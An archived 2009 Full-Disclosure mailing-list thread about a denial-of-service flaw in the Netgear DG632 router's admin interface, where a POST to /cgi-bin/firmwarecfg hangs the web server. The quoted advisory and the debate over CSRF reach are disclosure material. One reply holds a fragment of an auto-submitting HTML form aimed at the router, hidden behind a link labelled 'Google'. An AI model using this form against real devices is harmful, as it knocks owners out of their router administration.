Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
3APA3A, I was actually *agreeing* with you! lols. I think something got lost in translation! Sorry if I confused anyone really. Good luck. 2009/6/17 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>: > Adrian, > > If you can execute javascript - what is a reason to wait for user to > click the link? The message I reply stated there is no need to force > user to visit Web page and clicking the obfuscated link _sent_ to > admin is enougth. I replied in this case only GET request is possible. > Read the thread carefully before making conclusions. > > > --Wednesday, June 17, 2009, 2:58:15 AM, you wrote to > jeremi.gos...@motricity.com: > > AP> you would be surprised how many people out there (mistakenly) still > AP> think that only GET requests are CSRFable! > > AP> 2009/6/16 Jeremi Gosney : >>> Vladimir: "Where there is an open mind, there will always be a frontier." - >>> Charles Kettering >>> >>> >> action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'> >>> >>> >>> >> onclick='document.DoS.submit();'>Google >>> >>> >>> >>> -Original Message- >>> From: full-disclosure-boun...@lists.grok.org.uk >>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of >>> Vladimir Dubrovin >>> Sent: Tuesday, June 16, 2009 9:43 AM >>> To: sr. >>> Cc: full-disclosure@lists.grok.org.uk >>> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability >>> >>> Dear sr., >>> >>> clicking on the link can not produce POST request, only GET, unless >>> there are some special conditions, like crossite scripting >>> vulnerability in the router. >>> >>> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 >>> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk; >>> >>> s> it could still be carried out remotely by obfuscating a link sent to the >>> s> "admin" of the device. this would obviously rely on the admin clicking on >>> s> the link, and is more of a phishing / social engineering style attack. >>> this >>> s> would also rely on the router being setup with all of the default >>> internal >>> s> LAN ip's. >>> >>> s> sr. >>> >>> >>> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> >>> >>>>> Dear Tom Neaves, >>>>> >>>>> It still can be exploited from Internet even if "remote management" is >>>>> only accessible from local network. If you can trick user to visit Web >>>>> page, you can place a form on this page which targets to router and >>>>> request to router is issued from victim's browser. >>>>> >>>>> >>>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: >>>>> >>>>> TN> Hi. >>>>> >>>>> TN> I see where you're going but I think you're missing the point a >>>>> little. >>>>> By >>>>> TN> *default* the web interface is enabled on the LAN and accessible by >>>>> anyone >>>>> TN> on that LAN and the "remote management" interface (for the Internet) >>>>> is >>>>> TN> turned off. If the "remote management" interface was enabled, >>>>> stopping >>>>> ICMP >>>>> TN> echo responses would not resolve this issue at all, turning the >>>>> interface >>>>> TN> off would do though (or restricting by IP, ...ack). The "remote >>>>> management" >>>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no >>>>> amount of >>>>> TN> dropping ICMP goodness will help with this. Anyhow, I am happy to >>>>> discuss >>>>> TN> this off list with you if its still not clear to save spamming >>>>> everyone's >>>>> TN> inboxes. :o) >>>>> >>>>> TN> Tom >>>>> >>>>> TN> - Original Message - >>>>> TN> From: Alaa El yazghi >>>>> TN> To: Tom Neaves >>>>> TN> Cc: bugt...@securityfocus.com ; >>>>> full-disclosure@lists.gr
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Adrian, If you can execute javascript - what is a reason to wait for user to click the link? The message I reply stated there is no need to force user to visit Web page and clicking the obfuscated link _sent_ to admin is enougth. I replied in this case only GET request is possible. Read the thread carefully before making conclusions. --Wednesday, June 17, 2009, 2:58:15 AM, you wrote to jeremi.gos...@motricity.com: AP> you would be surprised how many people out there (mistakenly) still AP> think that only GET requests are CSRFable! AP> 2009/6/16 Jeremi Gosney : >> Vladimir: "Where there is an open mind, there will always be a frontier." - >> Charles Kettering >> >> > action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'> >> >> >> > onclick='document.DoS.submit();'>Google >> >> >> >> -Original Message- >> From: full-disclosure-boun...@lists.grok.org.uk >> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of >> Vladimir Dubrovin >> Sent: Tuesday, June 16, 2009 9:43 AM >> To: sr. >> Cc: full-disclosure@lists.grok.org.uk >> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability >> >> Dear sr., >> >> clicking on the link can not produce POST request, only GET, unless >> there are some special conditions, like crossite scripting >> vulnerability in the router. >> >> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 >> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk; >> >> s> it could still be carried out remotely by obfuscating a link sent to the >> s> "admin" of the device. this would obviously rely on the admin clicking on >> s> the link, and is more of a phishing / social engineering style attack. >> this >> s> would also rely on the router being setup with all of the default internal >> s> LAN ip's. >> >> s> sr. >> >> >> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> >> >>>> Dear Tom Neaves, >>>> >>>> It still can be exploited from Internet even if "remote management" is >>>> only accessible from local network. If you can trick user to visit Web >>>> page, you can place a form on this page which targets to router and >>>> request to router is issued from victim's browser. >>>> >>>> >>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: >>>> >>>> TN> Hi. >>>> >>>> TN> I see where you're going but I think you're missing the point a little. >>>> By >>>> TN> *default* the web interface is enabled on the LAN and accessible by >>>> anyone >>>> TN> on that LAN and the "remote management" interface (for the Internet) is >>>> TN> turned off. If the "remote management" interface was enabled, stopping >>>> ICMP >>>> TN> echo responses would not resolve this issue at all, turning the >>>> interface >>>> TN> off would do though (or restricting by IP, ...ack). The "remote >>>> management" >>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no >>>> amount of >>>> TN> dropping ICMP goodness will help with this. Anyhow, I am happy to >>>> discuss >>>> TN> this off list with you if its still not clear to save spamming >>>> everyone's >>>> TN> inboxes. :o) >>>> >>>> TN> Tom >>>> >>>> TN> - Original Message - >>>> TN> From: Alaa El yazghi >>>> TN> To: Tom Neaves >>>> TN> Cc: bugt...@securityfocus.com ; >>>> full-disclosure@lists.grok.org.uk >>>> TN> Sent: Monday, June 15, 2009 11:03 PM >>>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >>>> >>>> >>>> TN> I know and I understand. What I wanted to mean is that we can not >>>> eventually >>>> TN> acces to the web interface of a netgear router remotely if we cannot >>>> localy. >>>> TN> As for the DoS, it is simple to solve such attack from outside. We >>>> just >>>> TN> disable receiving pings (There is actually an option in even the lowest >>>> TN> series) and thus, we would be able to have
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
you would be surprised how many people out there (mistakenly) still think that only GET requests are CSRFable! 2009/6/16 Jeremi Gosney : > Vladimir: "Where there is an open mind, there will always be a frontier." - > Charles Kettering > > name='DoS'> > > > Google > > > > -Original Message- > From: full-disclosure-boun...@lists.grok.org.uk > [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Vladimir > Dubrovin > Sent: Tuesday, June 16, 2009 9:43 AM > To: sr. > Cc: full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability > > Dear sr., > > clicking on the link can not produce POST request, only GET, unless > there are some special conditions, like crossite scripting > vulnerability in the router. > > --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote > DoS Vulnerability to full-disclosure@lists.grok.org.uk; > > s> it could still be carried out remotely by obfuscating a link sent to the > s> "admin" of the device. this would obviously rely on the admin clicking on > s> the link, and is more of a phishing / social engineering style attack. this > s> would also rely on the router being setup with all of the default internal > s> LAN ip's. > > s> sr. > > > s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> > >>> Dear Tom Neaves, >>> >>> It still can be exploited from Internet even if "remote management" is >>> only accessible from local network. If you can trick user to visit Web >>> page, you can place a form on this page which targets to router and >>> request to router is issued from victim's browser. >>> >>> >>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: >>> >>> TN> Hi. >>> >>> TN> I see where you're going but I think you're missing the point a little. >>> By >>> TN> *default* the web interface is enabled on the LAN and accessible by >>> anyone >>> TN> on that LAN and the "remote management" interface (for the Internet) is >>> TN> turned off. If the "remote management" interface was enabled, stopping >>> ICMP >>> TN> echo responses would not resolve this issue at all, turning the >>> interface >>> TN> off would do though (or restricting by IP, ...ack). The "remote >>> management" >>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no >>> amount of >>> TN> dropping ICMP goodness will help with this. Anyhow, I am happy to >>> discuss >>> TN> this off list with you if its still not clear to save spamming >>> everyone's >>> TN> inboxes. :o) >>> >>> TN> Tom >>> >>> TN> - Original Message - >>> TN> From: Alaa El yazghi >>> TN> To: Tom Neaves >>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk >>> TN> Sent: Monday, June 15, 2009 11:03 PM >>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >>> >>> >>> TN> I know and I understand. What I wanted to mean is that we can not >>> eventually >>> TN> acces to the web interface of a netgear router remotely if we cannot >>> localy. >>> TN> As for the DoS, it is simple to solve such attack from outside. We >>> just >>> TN> disable receiving pings (There is actually an option in even the lowest >>> TN> series) and thus, we would be able to have a remote management without >>> ICMP >>> TN> requests. >>> >>> >>> >>> TN> 2009/6/15 Tom Neaves >>> >>> TN> Hi. >>> >>> TN> I'm not quite sure of your question... >>> >>> TN> The DoS can be carried out remotely, however one mitigating factor >>> (which >>> TN> makes it a low risk as opposed to sirens and alarms...) is that its >>> turned >>> TN> off by default - you have to explicitly enable it under "Remote >>> Management" >>> TN> on the device if you want to access it/carry out the DoS over the >>> Internet. >>> TN> However, it is worth noting that anyone on your LAN can *remotely* >>> carry out >>> TN> this attack regardless of this management feature being on/off. >>> >>>
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Vladimir: "Where there is an open mind, there will always be a frontier." - Charles Kettering Google -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Vladimir Dubrovin Sent: Tuesday, June 16, 2009 9:43 AM To: sr. Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability Dear sr., clicking on the link can not produce POST request, only GET, unless there are some special conditions, like crossite scripting vulnerability in the router. --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk; s> it could still be carried out remotely by obfuscating a link sent to the s> "admin" of the device. this would obviously rely on the admin clicking on s> the link, and is more of a phishing / social engineering style attack. this s> would also rely on the router being setup with all of the default internal s> LAN ip's. s> sr. s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> >> Dear Tom Neaves, >> >> It still can be exploited from Internet even if "remote management" is >> only accessible from local network. If you can trick user to visit Web >> page, you can place a form on this page which targets to router and >> request to router is issued from victim's browser. >> >> >> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: >> >> TN> Hi. >> >> TN> I see where you're going but I think you're missing the point a little. >> By >> TN> *default* the web interface is enabled on the LAN and accessible by >> anyone >> TN> on that LAN and the "remote management" interface (for the Internet) is >> TN> turned off. If the "remote management" interface was enabled, stopping >> ICMP >> TN> echo responses would not resolve this issue at all, turning the >> interface >> TN> off would do though (or restricting by IP, ...ack). The "remote >> management" >> TN> (love those quotes...) interface speaks over HTTP hence TCP so no >> amount of >> TN> dropping ICMP goodness will help with this. Anyhow, I am happy to >> discuss >> TN> this off list with you if its still not clear to save spamming >> everyone's >> TN> inboxes. :o) >> >> TN> Tom >> >> TN> - Original Message - >> TN> From: Alaa El yazghi >> TN> To: Tom Neaves >> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk >> TN> Sent: Monday, June 15, 2009 11:03 PM >> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >> >> >> TN> I know and I understand. What I wanted to mean is that we can not >> eventually >> TN> acces to the web interface of a netgear router remotely if we cannot >> localy. >> TN> As for the DoS, it is simple to solve such attack from outside. We >> just >> TN> disable receiving pings (There is actually an option in even the lowest >> TN> series) and thus, we would be able to have a remote management without >> ICMP >> TN> requests. >> >> >> >> TN> 2009/6/15 Tom Neaves >> >> TN> Hi. >> >> TN> I'm not quite sure of your question... >> >> TN> The DoS can be carried out remotely, however one mitigating factor >> (which >> TN> makes it a low risk as opposed to sirens and alarms...) is that its >> turned >> TN> off by default - you have to explicitly enable it under "Remote >> Management" >> TN> on the device if you want to access it/carry out the DoS over the >> Internet. >> TN> However, it is worth noting that anyone on your LAN can *remotely* >> carry out >> TN> this attack regardless of this management feature being on/off. >> >> TN> I hope this clarifies it for you. >> >> TN> Tom >> TN> - Original Message - >> TN> From: Alaa El yazghi >> TN> To: Tom Neaves >> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk >> TN> Sent: Monday, June 15, 2009 10:45 PM >> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >> >> >> TN> How can it be carried out remotely if it bugs localy? >> >> >> TN> 2009/6/15 Tom Neaves >> >> TN> Product Name: Netgear DG632 Router >> TN> Vendor: http://www.net
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Dear sr., clicking on the link can not produce POST request, only GET, unless there are some special conditions, like crossite scripting vulnerability in the router. --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk; s> it could still be carried out remotely by obfuscating a link sent to the s> "admin" of the device. this would obviously rely on the admin clicking on s> the link, and is more of a phishing / social engineering style attack. this s> would also rely on the router being setup with all of the default internal s> LAN ip's. s> sr. s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> >> Dear Tom Neaves, >> >> It still can be exploited from Internet even if "remote management" is >> only accessible from local network. If you can trick user to visit Web >> page, you can place a form on this page which targets to router and >> request to router is issued from victim's browser. >> >> >> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: >> >> TN> Hi. >> >> TN> I see where you're going but I think you're missing the point a little. >> By >> TN> *default* the web interface is enabled on the LAN and accessible by >> anyone >> TN> on that LAN and the "remote management" interface (for the Internet) is >> TN> turned off. If the "remote management" interface was enabled, stopping >> ICMP >> TN> echo responses would not resolve this issue at all, turning the >> interface >> TN> off would do though (or restricting by IP, ...ack). The "remote >> management" >> TN> (love those quotes...) interface speaks over HTTP hence TCP so no >> amount of >> TN> dropping ICMP goodness will help with this. Anyhow, I am happy to >> discuss >> TN> this off list with you if its still not clear to save spamming >> everyone's >> TN> inboxes. :o) >> >> TN> Tom >> >> TN> - Original Message - >> TN> From: Alaa El yazghi >> TN> To: Tom Neaves >> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk >> TN> Sent: Monday, June 15, 2009 11:03 PM >> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >> >> >> TN> I know and I understand. What I wanted to mean is that we can not >> eventually >> TN> acces to the web interface of a netgear router remotely if we cannot >> localy. >> TN> As for the DoS, it is simple to solve such attack from outside. We >> just >> TN> disable receiving pings (There is actually an option in even the lowest >> TN> series) and thus, we would be able to have a remote management without >> ICMP >> TN> requests. >> >> >> >> TN> 2009/6/15 Tom Neaves >> >> TN> Hi. >> >> TN> I'm not quite sure of your question... >> >> TN> The DoS can be carried out remotely, however one mitigating factor >> (which >> TN> makes it a low risk as opposed to sirens and alarms...) is that its >> turned >> TN> off by default - you have to explicitly enable it under "Remote >> Management" >> TN> on the device if you want to access it/carry out the DoS over the >> Internet. >> TN> However, it is worth noting that anyone on your LAN can *remotely* >> carry out >> TN> this attack regardless of this management feature being on/off. >> >> TN> I hope this clarifies it for you. >> >> TN> Tom >> TN> - Original Message - >> TN> From: Alaa El yazghi >> TN> To: Tom Neaves >> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk >> TN> Sent: Monday, June 15, 2009 10:45 PM >> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability >> >> >> TN> How can it be carried out remotely if it bugs localy? >> >> >> TN> 2009/6/15 Tom Neaves >> >> TN> Product Name: Netgear DG632 Router >> TN> Vendor: http://www.netgear.com >> TN> Date: 15 June, 2009 >> TN> Author: t...@tomneaves.co.uk >> TN> Original URL: >> TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt >> TN> Discovered: 18 November, 2006 >> TN> Disclosed: 15 June, 2009 >> >> TN> I. DESCRIPTION >> >> TN> The Netgear DG632 router has a web interface which runs on port 80. >> This >> TN> allow
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 and as previously stated, if you have 'remote management' enabled then you are truly vulnerable to outside threats. csrf works as well. but an attack carried out on the LAN would still be considered a remote attack; although, you'd likely be within arm's reach of the attacker, so you'd know who to punch in the nose when the web server stopped responding. both vectors are considered 'remote' since the attacker is not legitimately authenticated to the system. - - From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of sr. Sent: Tuesday, June 16, 2009 8:17 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability it could still be carried out remotely by obfuscating a link sent to the "admin" of the device. this would obviously rely on the admin clicking on the link, and is more of a phishing / social engineering style attack. this would also rely on the router being setup with all of the default internal LAN ip's. sr. 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> Dear Tom Neaves, It still can be exploited from Internet even if "remote management" is only accessible from local network. If you can trick user to visit Web page, you can place a form on this page which targets to router and request to router is issued from victim's browser. - --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: TN> Hi. TN> I see where you're going but I think you're missing the point a TN> little. By TN> *default* the web interface is enabled on the LAN and accessible by TN> anyone on that LAN and the "remote management" interface (for the TN> Internet) is turned off. If the "remote management" interface was TN> enabled, stopping ICMP echo responses would not resolve this issue TN> at all, turning the interface off would do though (or restricting by IP, ...ack). The "remote management" TN> (love those quotes...) interface speaks over HTTP hence TCP so no TN> amount of dropping ICMP goodness will help with this. Anyhow, I am TN> happy to discuss this off list with you if its still not clear to TN> save spamming everyone's inboxes. :o) TN> Tom TN> - Original Message - TN> From: Alaa El yazghi TN> To: Tom Neaves TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN> Sent: Monday, June 15, 2009 11:03 PM TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN> I know and I understand. What I wanted to mean is that we can not TN> eventually acces to the web interface of a netgear router remotely if we cannot localy. TN> As for the DoS, it is simple to solve such attack from outside. We TN> just disable receiving pings (There is actually an option in even TN> the lowest TN> series) and thus, we would be able to have a remote management TN> without ICMP requests. TN> 2009/6/15 Tom Neaves TN> Hi. TN> I'm not quite sure of your question... TN> The DoS can be carried out remotely, however one mitigating factor TN> (which makes it a low risk as opposed to sirens and alarms...) is TN> that its turned off by default - you have to explicitly enable it under "Remote Management" TN> on the device if you want to access it/carry out the DoS over the Internet. TN> However, it is worth noting that anyone on your LAN can *remotely* TN> carry out this attack regardless of this management feature being on/off. TN> I hope this clarifies it for you. TN> Tom TN> - Original Message - TN> From: Alaa El yazghi TN> To: Tom Neaves TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN> Sent: Monday, June 15, 2009 10:45 PM TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN> How can it be carried out remotely if it bugs localy? TN> 2009/6/15 Tom Neaves TN> Product Name: Netgear DG632 Router TN> Vendor: http://www.netgear.com TN> Date: 15 June, 2009 TN> Author: t...@tomneaves.co.uk Original URL: TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt TN> Discovered: 18 November, 2006 TN> Disclosed: 15 June, 2009 TN> I. DESCRIPTION TN> The Netgear DG632 router has a web interface which runs on port 80. TN> This allows an admin to login and administer the device's settings. TN> However, a Denial of Service (DoS) vulnerability exists that causes TN> the web interface to crash and stop responding to further requests. TN> II. DETAILS TN> Within the "/cgi-bin/" directory of the administrative web interface TN> exists a file called "firmwarecfg". This file is
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
it could still be carried out remotely by obfuscating a link sent to the "admin" of the device. this would obviously rely on the admin clicking on the link, and is more of a phishing / social engineering style attack. this would also rely on the router being setup with all of the default internal LAN ip's. sr. 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> > Dear Tom Neaves, > > It still can be exploited from Internet even if "remote management" is > only accessible from local network. If you can trick user to visit Web > page, you can place a form on this page which targets to router and > request to router is issued from victim's browser. > > > --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: > > TN> Hi. > > TN> I see where you're going but I think you're missing the point a little. > By > TN> *default* the web interface is enabled on the LAN and accessible by > anyone > TN> on that LAN and the "remote management" interface (for the Internet) is > TN> turned off. If the "remote management" interface was enabled, stopping > ICMP > TN> echo responses would not resolve this issue at all, turning the > interface > TN> off would do though (or restricting by IP, ...ack). The "remote > management" > TN> (love those quotes...) interface speaks over HTTP hence TCP so no > amount of > TN> dropping ICMP goodness will help with this. Anyhow, I am happy to > discuss > TN> this off list with you if its still not clear to save spamming > everyone's > TN> inboxes. :o) > > TN> Tom > > TN> - Original Message - > TN> From: Alaa El yazghi > TN> To: Tom Neaves > TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk > TN> Sent: Monday, June 15, 2009 11:03 PM > TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability > > > TN> I know and I understand. What I wanted to mean is that we can not > eventually > TN> acces to the web interface of a netgear router remotely if we cannot > localy. > TN> As for the DoS, it is simple to solve such attack from outside. We > just > TN> disable receiving pings (There is actually an option in even the lowest > TN> series) and thus, we would be able to have a remote management without > ICMP > TN> requests. > > > > TN> 2009/6/15 Tom Neaves > > TN> Hi. > > TN> I'm not quite sure of your question... > > TN> The DoS can be carried out remotely, however one mitigating factor > (which > TN> makes it a low risk as opposed to sirens and alarms...) is that its > turned > TN> off by default - you have to explicitly enable it under "Remote > Management" > TN> on the device if you want to access it/carry out the DoS over the > Internet. > TN> However, it is worth noting that anyone on your LAN can *remotely* > carry out > TN> this attack regardless of this management feature being on/off. > > TN> I hope this clarifies it for you. > > TN> Tom > TN> - Original Message - > TN> From: Alaa El yazghi > TN> To: Tom Neaves > TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk > TN> Sent: Monday, June 15, 2009 10:45 PM > TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability > > > TN> How can it be carried out remotely if it bugs localy? > > > TN> 2009/6/15 Tom Neaves > > TN> Product Name: Netgear DG632 Router > TN> Vendor: http://www.netgear.com > TN> Date: 15 June, 2009 > TN> Author: t...@tomneaves.co.uk > TN> Original URL: > TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt > TN> Discovered: 18 November, 2006 > TN> Disclosed: 15 June, 2009 > > TN> I. DESCRIPTION > > TN> The Netgear DG632 router has a web interface which runs on port 80. > This > TN> allows an admin to login and administer the device's settings. > However, > TN> a Denial of Service (DoS) vulnerability exists that causes the web > interface > TN> to crash and stop responding to further requests. > > TN> II. DETAILS > > TN> Within the "/cgi-bin/" directory of the administrative web interface > exists > TN> a > TN> file called "firmwarecfg". This file is used for firmware upgrades. A > HTTP > TN> POST > TN> request for this file causes the web server to hang. The web server > will > TN> stop > TN> responding to requests and the administrative interface will become > TN> inaccessible > TN> until the router is physically restarted. > > TN> While the router will still continue to function at the network level, > i.e. > TN> it will > TN> still respond to ICMP echo requests and issue leases via DHCP, an > TN> administrator will > TN> no longer be able to interact with the administrative web interface. > > TN> This attack can be carried out internally within the network, or over > the > TN> Internet > TN> if the administrator has enabled the "Remote Management" feature on the > TN> router. > > TN> Affected Versions: Firmware V3.4.0_ap (others unknown) > > TN> III. VENDOR RESPONSE > > TN> 12 June, 2009 - Contacted vendor. > TN> 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life > TN> product and is
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Dear Tom Neaves, It still can be exploited from Internet even if "remote management" is only accessible from local network. If you can trick user to visit Web page, you can place a form on this page which targets to router and request to router is issued from victim's browser. --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: TN> Hi. TN> I see where you're going but I think you're missing the point a little. By TN> *default* the web interface is enabled on the LAN and accessible by anyone TN> on that LAN and the "remote management" interface (for the Internet) is TN> turned off. If the "remote management" interface was enabled, stopping ICMP TN> echo responses would not resolve this issue at all, turning the interface TN> off would do though (or restricting by IP, ...ack). The "remote management" TN> (love those quotes...) interface speaks over HTTP hence TCP so no amount of TN> dropping ICMP goodness will help with this. Anyhow, I am happy to discuss TN> this off list with you if its still not clear to save spamming everyone's TN> inboxes. :o) TN> Tom TN> - Original Message - TN> From: Alaa El yazghi TN> To: Tom Neaves TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN> Sent: Monday, June 15, 2009 11:03 PM TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN> I know and I understand. What I wanted to mean is that we can not eventually TN> acces to the web interface of a netgear router remotely if we cannot localy. TN> As for the DoS, it is simple to solve such attack from outside. We just TN> disable receiving pings (There is actually an option in even the lowest TN> series) and thus, we would be able to have a remote management without ICMP TN> requests. TN> 2009/6/15 Tom Neaves TN> Hi. TN> I'm not quite sure of your question... TN> The DoS can be carried out remotely, however one mitigating factor (which TN> makes it a low risk as opposed to sirens and alarms...) is that its turned TN> off by default - you have to explicitly enable it under "Remote Management" TN> on the device if you want to access it/carry out the DoS over the Internet. TN> However, it is worth noting that anyone on your LAN can *remotely* carry out TN> this attack regardless of this management feature being on/off. TN> I hope this clarifies it for you. TN> Tom TN> - Original Message - TN> From: Alaa El yazghi TN> To: Tom Neaves TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN> Sent: Monday, June 15, 2009 10:45 PM TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN> How can it be carried out remotely if it bugs localy? TN> 2009/6/15 Tom Neaves TN> Product Name: Netgear DG632 Router TN> Vendor: http://www.netgear.com TN> Date: 15 June, 2009 TN> Author: t...@tomneaves.co.uk TN> Original URL: TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt TN> Discovered: 18 November, 2006 TN> Disclosed: 15 June, 2009 TN> I. DESCRIPTION TN> The Netgear DG632 router has a web interface which runs on port 80. This TN> allows an admin to login and administer the device's settings. However, TN> a Denial of Service (DoS) vulnerability exists that causes the web interface TN> to crash and stop responding to further requests. TN> II. DETAILS TN> Within the "/cgi-bin/" directory of the administrative web interface exists TN> a TN> file called "firmwarecfg". This file is used for firmware upgrades. A HTTP TN> POST TN> request for this file causes the web server to hang. The web server will TN> stop TN> responding to requests and the administrative interface will become TN> inaccessible TN> until the router is physically restarted. TN> While the router will still continue to function at the network level, i.e. TN> it will TN> still respond to ICMP echo requests and issue leases via DHCP, an TN> administrator will TN> no longer be able to interact with the administrative web interface. TN> This attack can be carried out internally within the network, or over the TN> Internet TN> if the administrator has enabled the "Remote Management" feature on the TN> router. TN> Affected Versions: Firmware V3.4.0_ap (others unknown) TN> III. VENDOR RESPONSE TN> 12 June, 2009 - Contacted vendor. TN> 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life TN> product and is no TN> longer supported in a production and development sense, as such, there will TN> be no further TN> firmware releases to resolve this issue. TN> IV. CREDIT TN> Discovered by Tom Neaves TN> ___ TN> Full-Disclosure - We believe in it. TN> Charter: http://lists.grok.org.uk/full-disclosure-charter.html TN> Hosted and sponsored by Secunia - http://secunia.com/ -- Skype: Vladimir.Dubrovin ~/ZARAZA http://securityvulns.com/ Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них поверили. (Твен) ___ Full-Di
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
Am Montag 15 Juni 2009 schrieb Tom Neaves: > Within the "/cgi-bin/" directory of the administrative web interface exists > a > file called "firmwarecfg". This file is used for firmware upgrades. A > HTTP POST > request for this file causes the web server to hang. The web server will > stop > responding to requests and the administrative interface will become > inaccessible > until the router is physically restarted. > > While the router will still continue to function at the network level, i.e. > it will > still respond to ICMP echo requests and issue leases via DHCP, an > administrator will > no longer be able to interact with the administrative web interface. > > This attack can be carried out internally within the network, or over the > Internet > if the administrator has enabled the "Remote Management" feature on the > router. Don't have such a device for tests, but isn't it possible to exploit this remotely through CSRF even without "Remote Management" option? (i.e. put some javascript on a webpage sending a post request to the default ip of the router?) -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail:ha...@hboeck.de http://ausdenaugenausdemsinn.de - Kein Sicherheitsrabatt für CO2-Speicher http://tinyurl.com/dceu73 - Internetzensur stoppen! http://schokokeks.org - professional webhosting signature.asc Description: This is a digitally signed message part. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
